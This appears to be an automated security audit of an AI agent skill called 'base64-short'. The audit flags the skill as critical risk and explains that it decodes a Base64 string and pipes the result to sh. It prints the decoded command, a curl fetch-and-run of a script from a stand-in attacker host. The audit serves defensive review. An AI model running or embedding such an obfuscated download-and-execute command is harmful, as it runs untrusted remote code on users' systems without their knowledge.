base64-short
Fail
Audited by Gen Agent Trust Hub on Apr 20, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill includes a command that decodes a Base64-encoded string and pipes the result directly to a shell (
sh). The decoded command iscurl -sL https://evil.example.org/x.sh, which downloads and executes a remote script without user validation or oversight.- [COMMAND_EXECUTION]: Employs theshutility to execute commands that are dynamically generated and decoded at runtime, a technique used to hide malicious activity from static analysis.- [EXTERNAL_DOWNLOADS]: Fetches a shell script fromhttps://evil.example.org/x.sh, which is an unknown and untrusted source.
Recommendations
- AI detected serious security threats
Audit Metadata